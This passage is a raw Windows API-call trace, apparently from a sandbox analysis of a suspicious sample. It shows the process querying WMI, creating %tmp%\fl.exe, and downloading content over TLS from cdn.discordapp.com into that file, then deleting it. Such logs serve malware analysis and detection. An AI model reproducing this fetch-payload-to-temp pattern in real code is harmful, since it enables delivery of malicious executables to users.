ppvObject=0x38ef08 | out: ppvObject=0x38ef08*=0x544f09c) returned 0x0 [0236.322] IClientSecurity:SetBlanket (This=0x544f09c, pProxy=0x544f098, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0236.323] IUnknown:Release (This=0x544f09c) returned 0x2 [0236.323] WbemLocator:IUnknown:Release (This=0x55c590c) returned 0x1 [0236.323] CoTaskMemFree (pv=0x55fedf8) [0236.323] IUnknown:AddRef (This=0x544f098) returned 0x2 [0236.324] CoGetContextToken (in: pToken=0x38e438 | out: pToken=0x38e438) returned 0x0 [0236.324] CoGetContextToken (in: pToken=0x38e84c | out: pToken=0x38e84c) returned 0x0 [0236.324] IUnknown:QueryInterface (in: This=0x544f098, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e7e4 | out: ppvObject=0x38e7e4*=0x55c58f4) returned 0x0 [0236.324] WbemLocator:IRpcOptions:Query (in: This=0x55c58f4, pPrx=0x563afc8, dwProperty=2, pdwValue=0x38e8d8 | out: pdwValue=0x38e8d8) returned 0x80004002 [0236.324] WbemLocator:IUnknown:Release (This=0x55c58f4) returned 0x2 [0236.324] CoGetContextToken (in: pToken=0x38ee1c | out: pToken=0x38ee1c) returned 0x0 [0236.324] CoGetContextToken (in: pToken=0x38ed7c | out: pToken=0x38ed7c) returned 0x0 [0236.324] IUnknown:QueryInterface (in: This=0x544f098, riid=0x38ee4c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ed18 | out: ppvObject=0x38ed18*=0x544f098) returned 0x0 [0236.325] IUnknown:Release (This=0x544f098) returned 0x2 [0236.325] SysStringLen (param_1=0x0) returned 0x0 [0236.325] IEnumWbemClassObject:Reset (This=0x544f098) returned 0x0 [0236.326] CoTaskMemAlloc (cb=0x4) returned 0x5642b40 [0236.326] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5642b40, puReturned=0x2670700 | out: apObjects=0x5642b40*=0x0, puReturned=0x2670700*=0x0) returned 0x1 [0236.327] CoTaskMemFree (pv=0x5642b40) [0236.327] CoGetContextToken (in: pToken=0x38ef90 | out: pToken=0x38ef90) returned 0x0 [0236.327] IUnknown:Release (This=0x544f098) returned 0x1 [0236.327] IUnknown:Release (This=0x544f098) returned 0x0 [0236.328] CoGetContextToken (in: pToken=0x38ef90 | out: pToken=0x38ef90) returned 0x0 [0236.328] IUnknown:Release (This=0x544efd0) returned 0x1 [0236.328] IUnknown:Release (This=0x544efd0) returned 0x0 [0236.342] CoCreateGuid (in: pguid=0x38edcc | out: pguid=0x38edcc*(Data1=0xe09aee38, Data2=0x9afb, Data3=0x4749, Data4=([0]=0x9a, [1]=0x10, [2]=0xfa, [3]=0xd0, [4]=0x19, [5]=0x8d, [6]=0x98, [7]=0x7c))) returned 0x0 [0236.343] CoCreateGuid (in: pguid=0x38ed10 | out: pguid=0x38ed10*(Data1=0xef8f2ef7, Data2=0xfdc4, Data3=0x4091, Data4=([0]=0x93, [1]=0x5e, [2]=0x1b, [3]=0x32, [4]=0xe6, [5]=0xea, [6]=0x42, [7]=0xbe))) returned 0x0 [0236.345] send (s=0x268, buf=0x2668257*, len=191, flags=0) returned 191 [0236.346] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 128 [0236.366] CoCreateGuid (in: pguid=0x38ee14 | out: pguid=0x38ee14*(Data1=0xd65479e8, Data2=0x1562, Data3=0x47e7, Data4=([0]=0xba, [1]=0xbc, [2]=0x67, [3]=0x1d, [4]=0x31, [5]=0x5d, [6]=0xaf, [7]=0x54))) returned 0x0 [0236.367] CoCreateGuid (in: pguid=0x38ed58 | out: pguid=0x38ed58*(Data1=0x8c8f02a2, Data2=0x3c31, Data3=0x4624, Data4=([0]=0xb3, [1]=0x43, [2]=0xae, [3]=0xb3, [4]=0x95, [5]=0xe7, [6]=0xbb, [7]=0x4))) returned 0x0 [0236.368] send (s=0x268, buf=0x2668257*, len=157, flags=0) returned 157 [0236.368] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 112 [0236.392] CoCreateGuid (in: pguid=0x38eddc | out: pguid=0x38eddc*(Data1=0xf704751e, Data2=0xbcff, Data3=0x4687, Data4=([0]=0xa4, [1]=0xac, [2]=0x84, [3]=0xb5, [4]=0xe5, [5]=0xcd, [6]=0x6b, [7]=0x1c))) returned 0x0 [0236.392] CoCreateGuid (in: pguid=0x38ed20 | out: pguid=0x38ed20*(Data1=0x8235cdf6, Data2=0x1f21, Data3=0x451e, Data4=([0]=0xa3, [1]=0xff, [2]=0x7d, [3]=0x7a, [4]=0x76, [5]=0x28, [6]=0x37, [7]=0x92))) returned 0x0 [0236.393] send (s=0x268, buf=0x2668257*, len=575, flags=0) returned 575 [0236.394] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 353 [0237.533] ExpandEnvironmentStringsW (in: lpSrc="%tmp%", lpDst=0x38efdc, nSize=0x64 | out: lpDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x25 [0237.533] ExpandEnvironmentStringsW (in: lpSrc="%tmp%\\fl.exe", lpDst=0x38efdc, nSize=0x64 | out: lpDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\fl.exe") returned 0x2c [0237.616] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x38eaec, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13 [0237.619] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\fl.exe", nBufferLength=0x105, lpBuffer=0x38eb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\fl.exe", lpFilePart=0x0) returned 0x2c [0237.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f018) returned 1 [0237.619] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\fl.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\fl.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x610 [0237.623] GetFileType (hFile=0x610) returned 0x1 [0237.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38f014) returned 1 [0237.623] GetFileType (hFile=0x610) returned 0x1 [0237.623] QueryPerformanceCounter (in: lpPerformanceCount=0x38f098 | out: lpPerformanceCount=0x38f098*=1200118136356) returned 1 [0237.625] SetEvent (hEvent=0x270) returned 1 [0237.685] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x620 [0237.686] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x63c [0237.687] GetAddrInfoW (in: pNodeName="cdn.discordapp.com", pServiceName=0x0, pHints=0x38edd0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x38ed78 | out: ppResult=0x38ed78*=0x564b738*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="cdn.discordapp.com", ai_addr=0x563af98*(sa_family=2, sin_port=0x0, sin_addr="162.159.129.233"), ai_next=0x564b148*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x563ae78*(sa_family=2, sin_port=0x0, sin_addr="162.159.130.233"), ai_next=0x564b760*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x563afc8*(sa_family=2, sin_port=0x0, sin_addr="162.159.133.233"), ai_next=0x564b4b8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x55ee468*(sa_family=2, sin_port=0x0, sin_addr="162.159.134.233"), ai_next=0x564b1c0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x55ee450*(sa_family=2, sin_port=0x0, sin_addr="162.159.135.233"), ai_next=0x0)))))) returned 0 [0237.750] FreeAddrInfoW (pAddrInfo=0x564b738*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="cdn.discordapp.com", ai_addr=0x563af98*(sa_family=2, sin_port=0x0, sin_addr="162.159.129.233"), ai_next=0x564b148*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x563ae78*(sa_family=2, sin_port=0x0, sin_addr="162.159.130.233"), ai_next=0x564b760*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x563afc8*(sa_family=2, sin_port=0x0, sin_addr="162.159.133.233"), ai_next=0x564b4b8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x55ee468*(sa_family=2, sin_port=0x0, sin_addr="162.159.134.233"), ai_next=0x564b1c0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x55ee450*(sa_family=2, sin_port=0x0, sin_addr="162.159.135.233"), ai_next=0x0)))))) [0237.751] WSAConnect (in: s=0x620, name=0x267d658*(sa_family=2, sin_port=0x1bb, sin_addr="162.159.129.233"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0237.765] closesocket (s=0x63c) returned 0 [0237.767] GetCurrentProcess () returned 0xffffffff [0237.767] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38eab8 | out: TokenHandle=0x38eab8*=0x63c) returned 1 [0237.768] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x25a5a48, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x38eb0c, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x267dd24, ptsExpiry=0x38ea90 | out: phCredential=0x267dd24, ptsExpiry=0x38ea90) returned 0x0 [0237.770] CloseHandle (hObject=0x63c) returned 1 [0237.770] InitializeSecurityContextW (in: phCredential=0x38eadc, phContext=0x0, pTargetName=0x267d6b0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x267dd9c, pOutput=0x267dd34, pfContextAttr=0x267dbbc, ptsExpiry=0x38ead4 | out: phNewContext=0x267dd9c, pOutput=0x267dd34, pfContextAttr=0x267dbbc, ptsExpiry=0x38ead4) returned 0x90312 [0237.788] FreeContextBuffer (in: pvContextBuffer=0x55ff858 | out: pvContextBuffer=0x55ff858) returned 0x0 [0237.788] send (s=0x620, buf=0x267ddb0*, len=160, flags=0) returned 160 [0237.789] recv (in: s=0x620, buf=0x267ddb0, len=5, flags=0 | out: buf=0x267ddb0*) returned 5 [0237.807] recv (in: s=0x620, buf=0x267ddb5, len=91, flags=0 | out: buf=0x267ddb5*) returned 91 [0237.807] InitializeSecurityContextW (in: phCredential=0x38ea38, phContext=0x38ea28, pTargetName=0x267d6b0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x267df00, Reserved2=0x0, phNewContext=0x267dd9c, pOutput=0x267df14, pfContextAttr=0x267dbbc, ptsExpiry=0x38ea30 | out: phNewContext=0x267dd9c, pOutput=0x267df14, pfContextAttr=0x267dbbc, ptsExpiry=0x38ea30) returned 0x90312 [0237.810] recv (in: s=0x620, buf=0x267dfa4, len=5, flags=0 | out: buf=0x267dfa4*) returned 5 [0237.810] recv (in: s=0x620, buf=0x267dfbd, len=2334, flags=0 | out: buf=0x267dfbd*) returned 2334 [0237.810] InitializeSecurityContextW (in: phCredential=0x38e998, phContext=0x38e988, pTargetName=0x267d6b0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x267e94c, Reserved2=0x0, phNewContext=0x267dd9c, pOutput=0x267e960, pfContextAttr=0x267dbbc, ptsExpiry=0x38e990 | out: phNewContext=0x267dd9c, pOutput=0x267e960, pfContextAttr=0x267dbbc, ptsExpiry=0x38e990) returned 0x90312 [0237.811] recv (in: s=0x620, buf=0x267e9f0, len=5, flags=0 | out: buf=0x267e9f0*) returned 5 [0237.811] recv (in: s=0x620, buf=0x267ea09, len=147, flags=0 | out: buf=0x267ea09*) returned 147 [0237.812] InitializeSecurityContextW (in: phCredential=0x38e8f8, phContext=0x38e8e8, pTargetName=0x267d6b0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x267eb0c, Reserved2=0x0, phNewContext=0x267dd9c, pOutput=0x267eb20, pfContextAttr=0x267dbbc, ptsExpiry=0x38e8f0 | out: phNewContext=0x267dd9c, pOutput=0x267eb20, pfContextAttr=0x267dbbc, ptsExpiry=0x38e8f0) returned 0x90312 [0237.812] recv (in: s=0x620, buf=0x267ebb0, len=5, flags=0 | out: buf=0x267ebb0*) returned 5 [0237.812] recv (in: s=0x620, buf=0x267ebc9, len=4, flags=0 | out: buf=0x267ebc9*) returned 4 [0237.812] InitializeSecurityContextW (in: phCredential=0x38e858, phContext=0x38e848, pTargetName=0x267d6b0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x267ec40, Reserved2=0x0, phNewContext=0x267dd9c, pOutput=0x267ec54, pfContextAttr=0x267dbbc, ptsExpiry=0x38e850 | out: phNewContext=0x267dd9c, pOutput=0x267ec54, pfContextAttr=0x267dbbc, ptsExpiry=0x38e850) returned 0x90312 [0237.825] FreeContextBuffer (in: pvContextBuffer=0x55fae20 | out: pvContextBuffer=0x55fae20) returned 0x0 [0237.825] send (s=0x620, buf=0x267ecd0*, len=126, flags=0) returned 126 [0237.825] recv (in: s=0x620, buf=0x267ecd0, len=5, flags=0 | out: buf=0x267ecd0*) returned 5 [0237.838] recv (in: s=0x620, buf=0x267ecd5, len=1, flags=0 | out: buf=0x267ecd5*) returned 1 [0237.839] InitializeSecurityContextW (in: phCredential=0x38e7b8, phContext=0x38e7a8, pTargetName=0x267d6b0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x267edd4, Reserved2=0x0, phNewContext=0x267dd9c, pOutput=0x267ede8, pfContextAttr=0x267dbbc, ptsExpiry=0x38e7b0 | out: phNewContext=0x267dd9c, pOutput=0x267ede8, pfContextAttr=0x267dbbc, ptsExpiry=0x38e7b0) returned 0x90312 [0237.892] recv (in: s=0x620, buf=0x267ee78, len=5, flags=0 | out: buf=0x267ee78*) returned 5 [0237.892] recv (in: s=0x620, buf=0x267ee91, len=40, flags=0 | out: buf=0x267ee91*) returned 40 [0237.892] InitializeSecurityContextW (in: phCredential=0x38e718, phContext=0x38e708, pTargetName=0x267d6b0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x267ef2c, Reserved2=0x0, phNewContext=0x267dd9c, pOutput=0x267ef40, pfContextAttr=0x267dbbc, ptsExpiry=0x38e710 | out: phNewContext=0x267dd9c, pOutput=0x267ef40, pfContextAttr=0x267dbbc, ptsExpiry=0x38e710) returned 0x0 [0237.895] QueryContextAttributesW (in: phContext=0x267dd9c, ulAttribute=0x4, pBuffer=0x267efdc | out: pBuffer=0x267efdc) returned 0x0 [0237.897] QueryContextAttributesW (in: phContext=0x267dd9c, ulAttribute=0x5a, pBuffer=0x267f018 | out: pBuffer=0x267f018) returned 0x0 [0237.898] QueryContextAttributesW (in: phContext=0x267dd9c, ulAttribute=0x53, pBuffer=0x267f064 | out: pBuffer=0x267f064) returned 0x0 [0237.899] CertDuplicateCRLContext (pCrlContext=0x563fe48) returned 0x563fe48 [0237.900] CertDuplicateStore (hCertStore=0x5476b98) returned 0x5476b98 [0237.900] CertEnumCertificatesInStore (hCertStore=0x5476b98, pPrevCertContext=0x0) returned 0x563fe98 [0237.900] CertDuplicateCRLContext (pCrlContext=0x563fe98) returned 0x563fe98 [0237.900] CertEnumCertificatesInStore (hCertStore=0x5476b98, pPrevCertContext=0x563fe98) returned 0x563fe48 [0237.901] CertDuplicateCRLContext (pCrlContext=0x563fe48) returned 0x563fe48 [0237.901] CertEnumCertificatesInStore (hCertStore=0x5476b98, pPrevCertContext=0x563fe48) returned 0x0 [0237.901] CertCloseStore (hCertStore=0x5476b98, dwFlags=0x0) returned 1 [0237.901] CertFreeCRLContext (pCrlContext=0x563fe48) returned 1 [0237.902] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x5476b20 [0237.903] CertAddCRLLinkToStore (in: hCertStore=0x5476b20, pCrlContext=0x563fe98, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0237.903] CertAddCRLLinkToStore (in: hCertStore=0x5476b20, pCrlContext=0x563fe48, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0237.903] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x54723a0 [0237.904] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x563fe48, pTime=0x38e724, hAdditionalStore=0x5476b20, pChainPara=0x38e664, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x38e658 | out: ppChainContext=0x38e658) returned 1 [0237.914] LocalFree (hMem=0x54723a0) returned 0x0 [0237.914] CertDuplicateCertificateChain (pChainContext=0x560a8f8) returned 0x560a8f8 [0237.915] CertDuplicateCRLContext (pCrlContext=0x563fe48) returned 0x563fe48 [0237.916] CertDuplicateCRLContext (pCrlContext=0x563ff88) returned 0x563ff88 [0237.916] CertDuplicateCRLContext (pCrlContext=0x55aa280) returned 0x55aa280 [0237.916] CertFreeCertificateChain (pChainContext=0x560a8f8) [0237.916] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x560a8f8, pPolicyPara=0x38e804, pPolicyStatus=0x38e7f0 | out: pPolicyStatus=0x38e7f0) returned 1 [0237.916] SetLastError (dwErrCode=0x0) [0237.916] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x560a8f8, pPolicyPara=0x38e864, pPolicyStatus=0x38e818 | out: pPolicyStatus=0x38e818) returned 1 [0237.919] CertFreeCertificateChain (pChainContext=0x560a8f8) [0237.919] CertFreeCRLContext (pCrlContext=0x563fe48) returned 1 [0237.920] EncryptMessage (in: phContext=0x267dd9c, fQOP=0x0, pMessage=0x26807a4, MessageSeqNo=0x0 | out: pMessage=0x26807a4) returned 0x0 [0237.922] send (s=0x620, buf=0x25aabcc*, len=163, flags=0) returned 163 [0237.923] setsockopt (s=0x620, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0237.923] recv (in: s=0x620, buf=0x25b5674, len=5, flags=0 | out: buf=0x25b5674*) returned 5 [0238.137] recv (in: s=0x620, buf=0x25b5679, len=1301, flags=0 | out: buf=0x25b5679*) returned 1301 [0238.137] DecryptMessage (in: phContext=0x267dd9c, pMessage=0x2680900, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2680900, pfQOP=0x0) returned 0x0 [0239.248] setsockopt (s=0x620, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0239.448] QueryContextAttributesW (in: phContext=0x267dd9c, ulAttribute=0x1a, pBuffer=0x38ec40 | out: pBuffer=0x38ec40) returned 0x0 [0239.449] DeleteSecurityContext (phContext=0x267dd9c) returned 0x0 [0239.449] shutdown (s=0x620, how=2) returned 0 [0239.450] closesocket (s=0x620) returned 0 [0239.612] CloseHandle (hObject=0x610) returned 1 [0239.612] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x38d8f4, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13 [0239.613] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\fl.exe", nBufferLength=0x105, lpBuffer=0x38d908, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\fl.exe", lpFilePart=0x0) returned 0x2c [0239.613] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\fl.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\fl.exe")) returned 1 [0239.615] CoGetContextToken (in: pToken=0x38fb98 | out: pToken=0x38fb98) returned 0x0 [0239.615] IUnknown:QueryInterface (in: This=0x6d0ca0, riid=0x7258b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38fbbc | out: ppvObject=0x38fbbc*=0x6d0cac) returned 0x0 [0239.615] IComThreadingInfo:GetCurrentThreadType (in: This=0x6d0cac, pThreadType=0x38fc1c | out: pThreadType=0x38fc1c*=0) returned 0x0 [0239.615] IUnknown:Release (This=0x6d0cac) returned 0x1 [0239.616] CoGetContextToken (in: pToken=0x38f8a4 | out: pToken=0x38f8a4) returned 0x0 [0239.616] IUnknown:QueryInterface (in: This=0x6d0ca0, riid=0x7258b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38f8c8 | out: ppvObject=0x38f8c8*=0x6d0cac) returned 0x0 [0239.616] IComThreadingInfo:GetCurrentThreadType (in: This=0x6d0cac, pThreadType=0x38f8f4 | out: pThreadType=0x38f8f4*=0) returned 0x0 [0239.616] IUnknown:Release (This=0x6d0cac) returned 0x1 [0239.624] CoGetContextToken (in: pToken=0x38f8a4 | out: pToken=0x38f8a4) returned 0x0 [0239.624] IUnknown:QueryInterface (in: This=0x6d0ca0, riid=0x7258b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38f8c8 | out: ppvObject=0x38f8c8*=0x6d0cac) returned 0x0 [0239.624] IComThreadingInfo:GetCurrentThreadType (in: This=0x6d0cac, pThreadType=0x38f8f4 | out: pThreadType=0x38f8f4*=0) returned 0x0 [0239.624] IUnknown:Release (This=0x6d0cac) returned 0x1 [0239.689] CoGetContextToken (in: pToken=0x38f8a4 | out: pToken=0x38f8a4) returned 0x0 [0239.690] IUnknown:QueryInterface (in: This=0x6d0ca0, riid=0x7258b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38f8c8 | out: ppvObject=0x38f8c8*=0x6d0cac) returned 0x0 [0239.690] IComThreadingInfo:GetCurrentThreadType (in: This=0x6d0cac, pThreadType=0x38f8f4 | out: pThreadType=0x38f8f4*=0) returned 0x0 [0239.702] IUnknown:Release (This=0x6d0cac) returned 0x1 [0239.738] CoGetContextToken (in: pToken=0x38f8c4 | out: pToken=0x38f8c4) returned 0x0 [0239.738] IUnknown:QueryInterface (in: This=0x6d0ca0, riid=0x7258b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38f8e8 | out: ppvObject=0x38f8e8*=0x6d0cac) returned 0x0 [0239.738] IComThreadingInfo:GetCurrentThreadType (in: This=0x6d0cac, pThreadType=0x38f914 | out: pThreadType=0x38f914*=0) returned 0x0 [0239.738] IUnknown:Release (This=0x6d0cac) returned 0x1 [0239.852] CoUninitialize () Thread: id = 93 os_tid = 0xf24 Thread: id = 95 os_tid = 0xf2c [0167.242] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0200.995] CoGetContextToken (in: pToken=0x461f964 | out: pToken=0x461f964) returned 0x0 [0200.995] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0200.995] WbemLocator:IUnknown:Release (This=0x5479360) returned 0x1 [0200.995] WbemLocator:IUnknown:Release (This=0x5479360) returned 0x0 [0200.995] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0200.995] IUnknown:Release (This=0x53f69d0) returned 0x2 [0200.995] IUnknown:Release (This=0x53f69d0) returned 0x1 [0200.995] IUnknown:Release (This=0x53f69d0) returned 0x0 [0200.996] CertFreeCRLContext (pCrlContext=0x753b28) returned 1 [0200.996] CertFreeCRLContext (pCrlContext=0x55aa230) returned 1 [0200.998] CertFreeCRLContext (pCrlContext=0x753ad8) returned 1 [0200.998] CertCloseStore (hCertStore=0x711188, dwFlags=0x0) returned 1 [0200.998] CertFreeCRLContext (pCrlContext=0x55aa280) returned 1 [0200.999] CertFreeCRLContext (pCrlContext=0x753ad8) returned 1 [0204.606] CoGetContextToken (in: pToken=0x461f964 | out: pToken=0x461f964) returned 0x0 [0204.606] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0204.606] WbemDefPath:IUnknown:Release (This=0x53abf38) returned 0x1 [0204.606] WbemDefPath:IUnknown:Release (This=0x53abf38) returned 0x0 [0204.606] CoGetContextToken (in: pToken=0x461f964 | out: pToken=0x461f964) returned 0x0 [0204.606] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0204.606] WbemLocator:IUnknown:Release (This=0x55aa830) returned 0x1 [0204.606] WbemLocator:IUnknown:Release (This=0x55aa830) returned 0x0 [0204.681] IUnknown:Release (This=0x6d0ca0) returned 0x0 [0204.681] RegCloseKey (hKey=0x5ec) returned 0x0 [0204.682] RegCloseKey (hKey=0x5e8) returned 0x0 [0204.886] GdipDisposeImage (image=0x492230) returned 0x0 [0234.331] CoGetContextToken (in: pToken=0x461f964 | out: pToken=0x461f964) returned 0x0 [0234.332] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.332] IUnknown:Release (This=0x5454cf8) returned 0x2 [0234.332] IUnknown:Release (This=0x5454cf8) returned 0x1 [0234.332] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.332] IUnknown:Release (This=0x53fddd8) returned 0x2 [0234.332] IUnknown:Release (This=0x53fddd8) returned 0x1 [0234.332] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.332] IUnknown:Release (This=0x541a768) returned 0x2 [0234.332] IUnknown:Release (This=0x541a768) returned 0x1 [0234.332] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.332] IUnknown:Release (This=0x5418760) returned 0x2 [0234.332] IUnknown:Release (This=0x5418760) returned 0x1 [0234.332] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.332] IUnknown:Release (This=0x53f69d0) returned 0x2 [0234.332] IUnknown:Release (This=0x53f69d0) returned 0x1 [0234.332] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.332] WbemLocator:IUnknown:Release (This=0x55ed408) returned 0x1 [0234.332] WbemLocator:IUnknown:Release (This=0x55ed408) returned 0x0 [0234.332] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.332] IUnknown:Release (This=0x53a7b50) returned 0x2 [0234.332] IUnknown:Release (This=0x53a7b50) returned 0x1 [0234.332] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.332] IUnknown:Release (This=0x560fc30) returned 0x2 [0234.332] IUnknown:Release (This=0x560fc30) returned 0x1 [0234.332] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.332] IUnknown:Release (This=0x5611770) returned 0x2 [0234.332] IUnknown:Release (This=0x5611770) returned 0x1 [0234.332] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.332] IUnknown:Release (This=0x5611430) returned 0x2 [0234.333] IUnknown:Release (This=0x5611430) returned 0x1 [0234.333] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.333] IUnknown:Release (This=0x56115c8) returned 0x2 [0234.333] IUnknown:Release (This=0x56115c8) returned 0x1 [0234.333] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.333] IUnknown:Release (This=0x5612900) returned 0x2 [0234.333] IUnknown:Release (This=0x5612900) returned 0x1 